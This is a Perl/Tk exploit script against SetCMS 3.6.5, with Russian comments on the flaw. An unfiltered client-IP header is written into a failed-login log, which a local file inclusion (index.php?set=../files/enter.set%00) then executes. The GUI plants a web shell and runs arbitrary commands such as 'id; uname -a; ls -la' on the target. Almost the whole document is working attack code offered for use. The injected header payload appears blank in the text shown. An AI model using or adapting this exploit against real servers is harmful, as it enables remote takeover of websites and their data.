#!/usr/bin/perl ## SetCMS v3.6.5 (setcms.org) remote commands execution exploit by RST/GHC ## o4.o9.2oo6 ## (c)oded by 1dt.w0lf ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE ## про багу: ## ## file: functions.php ## ## FUNCTION ip(){ ## global $user_id; ## if(getenv('HTTP_CLIENT_IP')) {$user_ip = getenv('HTTP_CLIENT_IP');} ## elseif(getenv('HTTP_X_FORWARDED_FOR')){$user_ip = getenv('HTTP_X_FORWARDED_FOR');} ## elseif(getenv('REMOTE_ADDR')) {$user_ip = getenv('REMOTE_ADDR');} ## else{$user_ip='unknown';} ## if(15 < strlen($user_ip)) ## { ## $ar = split(', ', $user_ip); ## for($i=0; $i < sizeof($ar); $i++) ## { ## if($ar[$i]!='' and !ereg('[a-zA-Z]', $ar[$i])){$user_ip = $ar[$i]; break; } ## if($i==sizeof($user_ip_pass)-1){$user_ip = 'unknown';} ## } ## } ## if(ereg('unknown', $user_ip) and $user_id!=''){ $user_ip .= $user_id; } ## return $user_ip; ## } ## ## таким образом заголовки HTTP не фильтруются и можно передать необходимые данные в CLIENT_IP или X_FORWARDED_FOR ## ... далее ## ## file: modules/users/index.php ## ## if ($mc == "enter" && (!isset($do) || $do == "")) ## { ## ... ## if ($enter == "0") ## { ## $fp = fopen("files/enter.set", "a+"); ## flock($fp, LOCK_EX); ## fwrite($fp, "$date::".regreplace($_POST['login'])."::".regreplace($_POST['pass'])."::$ip::\r\n"); ## flock($fp, LOCK_UN); ## fclose($fp); ## $text.= "
Неправильное сочетание имени пользователя и пароля. Информация о вашей попытке входа записана в лог-файл.
"; ## ## При неудачной попытке входа, отправленные данные записываются в файл files/enter.set, включая $ip =) ## ## И заканчивая ## ## file: index.php ## ## $set = $_GET['set']; ## ... ## //urls ## if (file_exists("modules/$set/index.php")) ## { ## if(file_exists("modules/$set/config.php")){include("modules/$set/config.php");} ## include("modules/$set/index.php"); ## } ## ## Локальный инклуд налицо =) ## index.php?set=../files/enter.set%00 ## Правда при условии magic = off ## ## eof use Tk; use Tk::Menu; use LWP::UserAgent; use Tk::DialogBox; $top = MainWindow->new(); $top->resizable(0,0); $path = 'http://server/setcms/index.php'; $cmd = 'id; uname -a; ls -la'; $xpl = LWP::UserAgent->new() or die; $top->title("r57setcms365"); Dialog2::ui($top); Dialog2::run() if defined &Dialog2::run; Tk::MainLoop(); sub Dialog2::ui { our($root) = @_; # Widget Initialization $_entry_1 = $root->Entry( -font => 'Verdana 8', -relief => "groove", -textvariable => \$path, -width => 0, ); $_entry_2 = $root->Entry( -font => 'Verdana 8', -relief => "groove", -textvariable => \$cmd, -width => 0, ); our($_label_1) = $root->Label( -font => 'Verdana 8', -text => "Path to index.php : ", ); our($_label_2) = $root->Label( -font => 'Verdana 8', -text => "Command for execute : ", ); our($_label_3) = $root->Label( -font => 'Verdana 8', -text => " >>> SetCMS 3.6.5 RCE sploit by RST/GHC", ); our($_button_1) = $root->Button( -font => 'Verdana 8 bold', -relief => "groove", -text => "Execute command", ); our($_button_2) = $root->Button( -font => 'Verdana 8 bold', -relief => "groove", -text => "Create shell", ); $_text_1 = $root->Text( -font => 'Verdana 8', -height => 0, -relief => "groove", -width => 0, ); our($_label_4) = $root->Label( -font => 'Verdana 8', -text => " (c)oded by 1dt.w0lf , RST/GHC , o4/o9/2oo6 , priv8", ); # widget commands $_button_1->configure( -command => \&execute ); $_button_2->configure( -command => \&create_shell ); # Geometry Management $_entry_1->grid( -in => $root, -column => 2, -row => 2, -columnspan => 2, -ipadx => 0, -ipady => 0, -padx => 4, -pady => 4, -rowspan => 1, -sticky => "ew" ); $_entry_2->grid( -in => $root, -column => 2, -row => 3, -columnspan => 2, -ipadx => 0, -ipady => 0, -padx => 4, -pady => 4, -rowspan => 1, -sticky => "ew" ); $_label_1->grid( -in => $root, -column => 1, -row => 2, -columnspan => 1, -ipadx => 0, -ipady => 0, -padx => 0, -pady => 0, -rowspan => 1, -sticky => "e" ); $_label_2->grid( -in => $root, -column => 1, -row => 3, -columnspan => 1, -ipadx => 0, -ipady => 0, -padx => 0, -pady => 0, -rowspan => 1, -sticky => "e" ); $_label_3->grid( -in => $root, -column => 1, -row => 1, -columnspan => 3, -ipadx => 0, -ipady => 0, -padx => 0, -pady => 0, -rowspan => 1, -sticky => "w" ); $_button_1->grid( -in => $root, -column => 3, -row => 4, -columnspan => 1, -ipadx => 0, -ipady => 0, -padx => 4, -pady => 4, -rowspan => 1, -sticky => "" ); $_button_2->grid( -in => $root, -column => 2, -row => 4, -columnspan => 1, -ipadx => 0, -ipady => 0, -padx => 4, -pady => 4, -rowspan => 1, -sticky => "e" ); $_text_1->grid( -in => $root, -column => 1, -row => 5, -columnspan => 3, -ipadx => 0, -ipady => 0, -padx => 5, -pady => 5, -rowspan => 1, -sticky => "news" ); $_label_4->grid( -in => $root, -column => 1, -row => 6, -columnspan => 2, -ipadx => 0, -ipady => 0, -padx => 0, -pady => 0, -rowspan => 1, -sticky => "w" ); # Resize Behavior $root->gridRowconfigure(1, -weight => 0, -minsize => 6, -pad => 0); $root->gridRowconfigure(2, -weight => 0, -minsize => 2, -pad => 0); $root->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0); $root->gridRowconfigure(4, -weight => 0, -minsize => 2, -pad => 0); $root->gridRowconfigure(5, -weight => 0, -minsize => 361, -pad => 0); $root->gridRowconfigure(6, -weight => 0, -minsize => 21, -pad => 0); $root->gridColumnconfigure(1, -weight => 0, -minsize => 110, -pad => 0); $root->gridColumnconfigure(2, -weight => 0, -minsize => 291, -pad => 0); $root->gridColumnconfigure(3, -weight => 0, -minsize => 2, -pad => 0); } sub create_shell() { $_text_1->delete("0.0",'end'); $already = 0; $res = $xpl->get($path."?set=../files/enter.set%00"); if(!$res->is_success) { &connect_error(); } else { if($res->content =~ /pes_barbos/) { $already = 1; } } if($already) { $_text_1->insert('end', "[!] Shell already created\n"); } else { $res = $xpl->post($path."?set=users&mc=enter", [ 'login' => 'pes_barbos', 'pass' => 'pes_barbos', ], 'CLIENT_IP' => ' ', ); if(!$res->is_success) { &connect_error(); } else { $_text_1->insert('end', "[+] Shell created!\n[+] Now you can execute commands!\n"); } } } sub execute() { $_text_1->delete("0.0",'end'); $_text_1->insert('end',"[~] Try execute command\n"); $res = $xpl->post($path."?set=../files/enter.set%00",['RSTGHC'=>$cmd]); if(!$res->is_success) { &connect_error(); } else { @rez = split("R57SETCMSXPL",$res->content); $_text_1->insert('end',@rez[1]); $_text_1->insert('end',"[+] EOF\n"); } } sub connect_error() { $_text_1->insert('end', "[-] Error: ".$res->status_line."\n"); } 1;